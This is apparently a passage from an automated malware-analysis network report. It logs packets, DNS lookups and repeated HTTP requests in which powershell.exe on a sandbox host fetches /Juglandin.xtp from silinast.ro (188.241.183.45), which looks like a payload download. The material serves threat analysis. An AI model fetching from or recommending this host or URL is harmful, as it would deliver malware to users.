              Oct 8, 2024 11:02:57.203896046 CEST6225380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.203972101 CEST6225380192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.208884954 CEST8062253188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:57.209351063 CEST8062253188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:57.210105896 CEST6225480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.215049982 CEST8062254188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:57.215125084 CEST6225480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.215179920 CEST6225480192.168.2.6188.241.183.45
              Oct 8, 2024 11:02:57.220347881 CEST8062254188.241.183.45192.168.2.6
              Oct 8, 2024 11:02:57.220647097 CEST8062254188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.229247093 CEST6225580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.234306097 CEST8062255188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.235193968 CEST6225580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.235275984 CEST6225580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.539417028 CEST6225580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.681230068 CEST8062255188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.681433916 CEST8062255188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.683087111 CEST8062255188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.687671900 CEST6225680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.692917109 CEST8062256188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.693002939 CEST6225680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.696805000 CEST6225680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.698132992 CEST8062256188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.698182106 CEST6225680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.700979948 CEST6225680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:01.701693058 CEST8062256188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.702924967 CEST8062256188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:01.705774069 CEST8062256188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.730051041 CEST6225780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.735197067 CEST8062257188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.735325098 CEST6225780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.735538006 CEST6225780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.740292072 CEST8062257188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.740458965 CEST8062257188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.741695881 CEST6225880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.746563911 CEST8062258188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.746680021 CEST6225880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.746838093 CEST6225880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:05.751620054 CEST8062258188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:05.751734972 CEST8062258188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.760999918 CEST6228680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.766259909 CEST8062286188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.766376972 CEST6228680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.766518116 CEST6228680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.771374941 CEST8062286188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.771598101 CEST8062286188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.772245884 CEST6228780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.777307987 CEST8062287188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.777390003 CEST6228780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.777503967 CEST6228780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:09.782272100 CEST8062287188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:09.782500029 CEST8062287188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.814388990 CEST6228880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.819458008 CEST8062288188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.819557905 CEST6228880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.819681883 CEST6228880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.824645042 CEST8062288188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.824944973 CEST8062288188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.826003075 CEST6228980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.830993891 CEST8062289188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.831078053 CEST6228980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.831142902 CEST6228980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:13.836168051 CEST8062289188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:13.837037086 CEST8062289188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.839881897 CEST6229080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.844736099 CEST8062290188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.846014023 CEST6229080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.846098900 CEST6229080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.850867033 CEST8062290188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.851165056 CEST8062290188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.856283903 CEST6229180192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.861192942 CEST8062291188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.861368895 CEST6229180192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.861368895 CEST6229180192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:17.866205931 CEST8062291188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:17.866431952 CEST8062291188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.870786905 CEST6229280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.875585079 CEST8062292188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.875690937 CEST6229280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.875823975 CEST6229280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.880631924 CEST8062292188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.880798101 CEST8062292188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.882119894 CEST6229380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.886919975 CEST8062293188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.887016058 CEST6229380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.887191057 CEST6229380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:21.891990900 CEST8062293188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:21.892496109 CEST8062293188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.917361975 CEST6229780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.922148943 CEST8062297188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.922277927 CEST6229780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.922327042 CEST6229780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.927123070 CEST8062297188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.927361965 CEST8062297188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.928363085 CEST6229880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.933212996 CEST8062298188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.935595036 CEST6229880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.935725927 CEST6229880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:25.940500021 CEST8062298188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:25.940885067 CEST8062298188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:29.961530924 CEST6231780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:29.966304064 CEST8062317188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:29.966433048 CEST6231780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:29.971523046 CEST8062317188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:29.971676111 CEST6231780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.031838894 CEST6231780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.031938076 CEST6231780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.034828901 CEST6231880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.036678076 CEST8062317188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.036732912 CEST8062317188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.039637089 CEST8062318188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.040086031 CEST6231880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.042226076 CEST6231880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.045115948 CEST8062318188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.045689106 CEST6231880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.047044992 CEST8062318188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.047655106 CEST6231880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:30.050446033 CEST8062318188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:30.052428961 CEST8062318188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.667705059 CEST6232580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.672637939 CEST8062325188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.672804117 CEST6232580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.672911882 CEST6232580192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.677742958 CEST8062325188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.677998066 CEST8062325188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.680433989 CEST6232680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.685344934 CEST8062326188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.686851025 CEST6232680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.686928988 CEST6232680192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:34.691787958 CEST8062326188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:34.691981077 CEST8062326188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.700870991 CEST6232780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.706135035 CEST8062327188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.706224918 CEST6232780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.706401110 CEST6232780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.711222887 CEST8062327188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.711458921 CEST8062327188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.713620901 CEST6232880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.718579054 CEST8062328188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.718666077 CEST6232880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.718795061 CEST6232880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:38.723659039 CEST8062328188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:38.724102020 CEST8062328188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.743686914 CEST6232980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.750745058 CEST8062329188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.750827074 CEST6232980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.751023054 CEST6232980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.757971048 CEST8062329188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.758400917 CEST8062329188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.760466099 CEST6233080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.767199993 CEST8062330188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.767340899 CEST6233080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.767398119 CEST6233080192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:42.774342060 CEST8062330188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:42.774652958 CEST8062330188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.802853107 CEST6235280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.808001041 CEST8062352188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.808094978 CEST6235280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.808346987 CEST6235280192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.813168049 CEST8062352188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.813180923 CEST8062352188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.815010071 CEST6235380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.819890976 CEST8062353188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.819967031 CEST6235380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.820125103 CEST6235380192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:46.824922085 CEST8062353188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:46.824959993 CEST8062353188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.845453024 CEST6236780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.851366043 CEST8062367188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.851465940 CEST6236780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.851618052 CEST6236780192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.856775999 CEST8062367188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.857012987 CEST8062367188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.860575914 CEST6236880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.866666079 CEST8062368188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.867166996 CEST6236880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.872479916 CEST8062368188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.872592926 CEST6236880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.872802973 CEST6236880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.872802973 CEST6236880192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:50.877700090 CEST8062368188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:50.877727985 CEST8062368188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:54.886898994 CEST6236980192.168.2.6188.241.183.45
              Oct 8, 2024 11:03:54.891741991 CEST8062369188.241.183.45192.168.2.6
              Oct 8, 2024 11:03:54.891827106 CEST6236980192.168.2.6188.241.183.45
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Oct 8, 2024 11:01:48.675131083 CEST | 57122 | 53 | 192.168.2.6 | 1.1.1.1
              Oct 8, 2024 11:01:48.691035986 CEST | 53 | 57122 | 1.1.1.1 | 192.168.2.6
              Oct 8, 2024 11:01:50.925407887 CEST | 63527 | 53 | 192.168.2.6 | 1.1.1.1
              Oct 8, 2024 11:01:50.979487896 CEST | 53 | 63527 | 1.1.1.1 | 192.168.2.6
              Oct 8, 2024 11:02:06.624134064 CEST | 53 | 63922 | 1.1.1.1 | 192.168.2.6
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Oct 8, 2024 11:01:48.675131083 CEST | 192.168.2.6 | 1.1.1.1 | 0xa0bf | Standard query (0) | 6777.6777.6777.677e | A (IP address) | IN (0x0001) | false
              Oct 8, 2024 11:01:50.925407887 CEST | 192.168.2.6 | 1.1.1.1 | 0xdd42 | Standard query (0) | silinast.ro | A (IP address) | IN (0x0001) | false
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Oct 8, 2024 11:01:48.691035986 CEST | 1.1.1.1 | 192.168.2.6 | 0xa0bf | Name error (3) | 6777.6777.6777.677e | none | none | A (IP address) | IN (0x0001) | false
              Oct 8, 2024 11:01:50.979487896 CEST | 1.1.1.1 | 192.168.2.6 | 0xdd42 | No error (0) | silinast.ro |  | 188.241.183.45 | A (IP address) | IN (0x0001) | false
              • silinast.ro
              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.6 | 49764 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:01:51.010797977 CEST | 168 | OUT | GET /Juglandin.xtp HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              1 | 192.168.2.6 | 49765 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:01:51.032905102 CEST | 168 | OUT | GET /Juglandin.xtp HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              2 | 192.168.2.6 | 49800 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:01:55.386255980 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              3 | 192.168.2.6 | 49801 | 188.241.183.45 | 80 | 1336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Timestamp | Bytes transferred | Direction | Data
              Oct 8, 2024 11:01:55.399945021 CEST | 74 | OUT | GET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.649827188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:01:59.429553986 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.649828188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:01:59.445091009 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.649840188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:03.515549898 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.649841188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:03.526402950 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.662204188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:07.533785105 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.662205188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:07.545013905 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.662206188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:11.604522943 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.662207188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:11.616449118 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.662208188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:15.766910076 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.662209188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:15.781862974 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.662210188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:20.132886887 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.662211188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:20.144181013 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.662212188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:24.156074047 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.662213188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:24.166860104 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.662214188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:28.204714060 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.662215188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:28.216144085 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.662239188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:32.239213943 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              21192.168.2.662240188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:32.249557018 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              22192.168.2.662243188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:36.328084946 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              23192.168.2.662244188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:36.338532925 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              24192.168.2.662245188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:40.343605042 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              25192.168.2.662246188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:40.354054928 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              26192.168.2.662247188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:44.418354034 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.662248188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:44.446125031 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.662249188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:48.951987982 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.662250188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:48.964099884 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.662251188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:53.156673908 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.662252188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:53.193588972 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.662253188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:57.203972101 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.662254188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:57.215179920 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.662255188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:01.235275984 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive
              Oct 8, 2024 11:03:01.539417028 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.662256188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
